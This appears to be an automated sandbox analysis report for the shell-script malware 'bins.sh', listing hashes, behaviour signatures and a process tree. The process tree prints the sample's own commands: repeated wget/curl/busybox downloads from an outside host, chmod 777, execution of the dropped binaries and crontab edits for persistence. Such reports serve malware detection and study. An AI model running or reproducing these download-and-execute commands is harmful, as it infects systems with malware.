Analysis
max time kernel: 151s
max time network: 153s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 31-10-2024 10:13
Static task: static1
Behavioral task behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample bins.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample bins.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample bins.sh, resource debian9-mipsel-20240611-en
General
Target: bins.sh
Size: 10KB
MD5: 98a18e866b60daae3e685f11a1ba8de3
SHA1: e75c8b59ac625180b75dc09236815562ee7c7516
SHA256: daa972a65e4384ed36b00c3de5b45b5b31f4f5e6d8662bc8e31a6d7f3970ed86
SHA512: 447380c5ee983ce566fd27ea9b62fb7da4fd0bab865cda320bfd4909ce03ac7a85a62919f6966e0007196ba30b6cac337efe2907d476d09ff680786ec835a33d
SSDEEP: 192:kc45CiAzRJ0VRYnXJa3IAEb66so0KdzKVRYnX5cAEb664o04vc45Ci6RJ1:kc45CiAzRJxa3IVj6c45Ci6RJ1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
828  chmod
834  chmod
897  chmod
935  chmod
916  chmod
799  chmod
815  chmod
821  chmod
865  chmod
903  chmod
922  chmod
929  chmod
948  chmod
734  chmod
744  chmod
845  chmod
877  chmod
889  chmod
910  chmod
941  chmod
-
Executes dropped EXE 7 IoCs
ioc                                      pid  Process
/tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu  735  lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu
/tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6  745  sgAW8gTvfedveDVZi11XW1pkq2gx7igga6
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15  800  ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo  816  jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
/tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY  904  ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15  917  ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo  923  jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
-
Renames itself 1 IoCs
pid  Process
801  ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description                   ioc                                  Process
File opened for modification  /var/spool/cron/crontabs/tmp.szHAQb  crontab
-
Enumerates running processes
Discovers information about currently running processes on the system
-
System Network Configuration Discovery 1 TTPs 61 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description                   ioc                                      Process
File opened for modification  /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6  busybox
File opened for modification  /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15  curl
File opened for modification  /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo  busybox
File opened for modification  /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY  busybox
File opened for modification  /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo  busybox
File opened for modification  /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu  curl
File opened for modification  /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu  busybox
File opened for modification  /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6  curl
Processes
(PID, image, command line; indentation shows the parent/child relationship; signature matches are listed under each process)

PID 703  /tmp/bins.sh  /tmp/bins.sh
  PID 710  /bin/rm  /bin/rm bins.sh
  PID 712  /usr/bin/wget  wget http://conn.masjesu.zip/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu
      - System Network Configuration Discovery
  PID 721  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu
      - System Network Configuration Discovery
      - Writes file to tmp directory
  PID 731  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu
      - System Network Configuration Discovery
      - Writes file to tmp directory
  PID 734  /bin/chmod  chmod 777 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu
      - File and Directory Permissions Modification
  PID 735  /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu  ./lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu
      - Executes dropped EXE
  PID 738  /bin/rm  rm lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu
  PID 739  /usr/bin/wget  wget http://conn.masjesu.zip/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6
      - System Network Configuration Discovery
  PID 740  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6
      - System Network Configuration Discovery
      - Writes file to tmp directory
  PID 743  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6
      - System Network Configuration Discovery
      - Writes file to tmp directory
  PID 744  /bin/chmod  chmod 777 sgAW8gTvfedveDVZi11XW1pkq2gx7igga6
      - File and Directory Permissions Modification
  PID 745  /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6  ./sgAW8gTvfedveDVZi11XW1pkq2gx7igga6
      - Executes dropped EXE
  PID 747  /bin/rm  rm sgAW8gTvfedveDVZi11XW1pkq2gx7igga6
  PID 748  /usr/bin/wget  wget http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
      - System Network Configuration Discovery
  PID 752  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
      - System Network Configuration Discovery
      - Writes file to tmp directory
  PID 797  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
      - System Network Configuration Discovery
  PID 799  /bin/chmod  chmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
      - File and Directory Permissions Modification
  PID 800  /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15  ./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
      - Executes dropped EXE
      - Renames itself
      - Reads runtime system information
    PID 802  /bin/sh  sh -c "crontab -l"
      PID 803  /usr/bin/crontab  crontab -l
          - Reads runtime system information
    PID 805  /bin/sh  sh -c "crontab -"
      PID 806  /usr/bin/crontab  crontab -
          - Creates/modifies Cron job
  PID 808  /bin/rm  rm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
  PID 812  /usr/bin/wget  wget http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
      - System Network Configuration Discovery
  PID 813  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
      - System Network Configuration Discovery
  PID 814  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
      - System Network Configuration Discovery
      - Writes file to tmp directory
  PID 815  /bin/chmod  chmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
      - File and Directory Permissions Modification
  PID 816  /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo  ./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
      - Executes dropped EXE
  PID 817  /bin/rm  rm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
  PID 818  /usr/bin/wget  wget http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
      - System Network Configuration Discovery
  PID 819  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
      - System Network Configuration Discovery
  PID 820  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
      - System Network Configuration Discovery
  PID 821  /bin/chmod  chmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
      - File and Directory Permissions Modification
  PID 822  /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX  ./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
  PID 824  /bin/rm  rm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
  PID 825  /usr/bin/wget  wget http://conn.masjesu.zip/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88
      - System Network Configuration Discovery
  PID 826  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88
      - System Network Configuration Discovery
  PID 827  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88
      - System Network Configuration Discovery
  PID 828  /bin/chmod  chmod 777 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88
      - File and Directory Permissions Modification
  PID 829  /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88  ./P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88
      - System Network Configuration Discovery
  PID 830  /bin/rm  rm P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88
      - System Network Configuration Discovery
  PID 831  /usr/bin/wget  wget http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
      - System Network Configuration Discovery
  PID 832  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
      - System Network Configuration Discovery
  PID 833  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
      - System Network Configuration Discovery
  PID 834  /bin/chmod  chmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
      - File and Directory Permissions Modification
  PID 835  /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs  ./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
  PID 836  /bin/rm  rm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
  PID 837  /usr/bin/wget  wget http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
      - System Network Configuration Discovery
  PID 839  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
      - System Network Configuration Discovery
  PID 843  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
      - System Network Configuration Discovery
  PID 845  /bin/chmod  chmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
      - File and Directory Permissions Modification
  PID 848  /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6  ./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
  PID 849  /bin/rm  rm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
  PID 852  /usr/bin/wget  wget http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
      - System Network Configuration Discovery
  PID 853  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
      - System Network Configuration Discovery
  PID 855  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
      - System Network Configuration Discovery
  PID 865  /bin/chmod  chmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
      - File and Directory Permissions Modification
  PID 868  /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk  ./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
  PID 869  /bin/rm  rm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
  PID 872  /usr/bin/wget  wget http://conn.masjesu.zip/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR
      - System Network Configuration Discovery
  PID 873  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR
      - System Network Configuration Discovery
  PID 876  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR
      - System Network Configuration Discovery
  PID 877  /bin/chmod  chmod 777 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR
      - File and Directory Permissions Modification
  PID 880  /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR  ./rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR
  PID 881  /bin/rm  rm rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR
  PID 884  /usr/bin/wget  wget http://conn.masjesu.zip/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8
      - System Network Configuration Discovery
  PID 885  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8
      - System Network Configuration Discovery
  PID 888  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8
      - System Network Configuration Discovery
  PID 889  /bin/chmod  chmod 777 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8
      - File and Directory Permissions Modification
  PID 891  /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8  ./Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8
  PID 893  /bin/rm  rm Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8
  PID 894  /usr/bin/wget  wget http://conn.masjesu.zip/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi
      - System Network Configuration Discovery
  PID 895  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi
      - System Network Configuration Discovery
  PID 896  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi
      - System Network Configuration Discovery
  PID 897  /bin/chmod  chmod 777 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi
      - File and Directory Permissions Modification
  PID 898  /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi  ./wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi
  PID 899  /bin/rm  rm wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi
  PID 900  /usr/bin/wget  wget http://conn.masjesu.zip/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY
      - System Network Configuration Discovery
  PID 901  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY
      - System Network Configuration Discovery
  PID 902  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY
      - System Network Configuration Discovery
      - Writes file to tmp directory
  PID 903  /bin/chmod  chmod 777 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY
      - File and Directory Permissions Modification
  PID 904  /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY  ./ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY
      - Executes dropped EXE
  PID 906  /bin/rm  rm ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY
  PID 907  /usr/bin/wget  wget http://conn.masjesu.zip/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90
  PID 908  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90
  PID 909  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90
  PID 910  /bin/chmod  chmod 777 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90
      - File and Directory Permissions Modification
  PID 911  /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90  ./Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90
  PID 912  /bin/rm  rm Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90
  PID 913  /usr/bin/wget  wget http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
      - System Network Configuration Discovery
  PID 914  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
      - System Network Configuration Discovery
  PID 915  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
      - System Network Configuration Discovery
  PID 916  /bin/chmod  chmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
      - File and Directory Permissions Modification
  PID 917  /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15  ./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
      - Executes dropped EXE
  PID 918  /bin/rm  rm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15
  PID 919  /usr/bin/wget  wget http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
      - System Network Configuration Discovery
  PID 920  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
      - System Network Configuration Discovery
  PID 921  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
      - System Network Configuration Discovery
      - Writes file to tmp directory
  PID 922  /bin/chmod  chmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
      - File and Directory Permissions Modification
  PID 923  /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo  ./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
      - Executes dropped EXE
  PID 925  /bin/rm  rm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo
  PID 926  /usr/bin/wget  wget http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
      - System Network Configuration Discovery
  PID 927  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
      - System Network Configuration Discovery
  PID 928  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
      - System Network Configuration Discovery
  PID 929  /bin/chmod  chmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
      - File and Directory Permissions Modification
  PID 930  /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX  ./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
  PID 931  /bin/rm  rm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX
  PID 932  /usr/bin/wget  wget http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
      - System Network Configuration Discovery
  PID 933  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
      - System Network Configuration Discovery
  PID 934  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
      - System Network Configuration Discovery
  PID 935  /bin/chmod  chmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
      - File and Directory Permissions Modification
  PID 936  /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs  ./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
  PID 937  /bin/rm  rm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs
  PID 938  /usr/bin/wget  wget http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
      - System Network Configuration Discovery
  PID 939  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
      - System Network Configuration Discovery
  PID 940  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
      - System Network Configuration Discovery
  PID 941  /bin/chmod  chmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
      - File and Directory Permissions Modification
  PID 942  /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6  ./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
  PID 943  /bin/rm  rm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6
  PID 944  /usr/bin/wget  wget http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
      - System Network Configuration Discovery
  PID 945  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
      - System Network Configuration Discovery
  PID 946  /bin/busybox  /bin/busybox wget http://conn.masjesu.zip/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
      - System Network Configuration Discovery
  PID 948  /bin/chmod  chmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
      - File and Directory Permissions Modification
  PID 949  /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk  ./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
  PID 950  /bin/rm  rm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk
  PID 951  /usr/bin/wget  wget http://conn.masjesu.zip/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR
      - System Network Configuration Discovery
  PID 952  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR
      - System Network Configuration Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads